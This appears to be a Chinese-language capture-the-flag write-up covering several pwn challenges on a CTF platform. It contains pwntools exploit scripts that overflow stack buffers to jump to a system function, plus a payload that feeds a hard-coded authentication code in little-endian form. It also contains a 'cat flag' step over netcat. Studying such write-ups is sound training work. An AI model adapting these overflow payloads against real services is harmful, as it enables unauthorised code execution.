浅红欺醉粉,肯信有江梅

nc 靶机 ,输入

1
2
3
ls
cat flag

领取你的小猫娘

简单栈溢出,输入搭配覆盖v5就行了

1
2
3
4
5
6
7
8
from pwn import*                                                                                                        context(os='linux',arch='amd64',log_level='debug')
p=remote("challenge.qsnctf.com",31446)

system=0x401232
payload=b'a'*(0x50)+p64(system)
p.sendline(payload)

p.interactive()

江南无所有,聊赠一枝春

题目提示藏有gift,打开ida查找
![[gift.png]]
看到漏洞
exp:

1
2
3
4
5
6
7
8
from pwn import*                                                                                                        context(os='linux',arch='amd64',log_level='debug')
p=remote("challenge.qsnctf.com",31049)

system=0x4011DC
payload=b'a'*(0x48)+p64(system)
p.sendlineafter(b'gift?\n',payload)

p.interactive()

借的东风破金锁

打开ida,看见if函数条件,点击auth_code,查看它的值是53514E55435446h

1
.data:0000000000004010 46 54 43 55 4E 51 53 00       auth_code dq 53514E55435446h

丢给ai,转化为小端存储
![[ai.png]]
exp:

1
2
3
4
5
6
7
8
9
10
from pwn import *
p=remote('challenge.qsnctf.com',32742)

#p=process('./key')

payload=b'\x46\x54\x43\x55\x4E\x51\x53\x00' + b'A'*8  

p.sendline(payload)

p.interactive()
backtop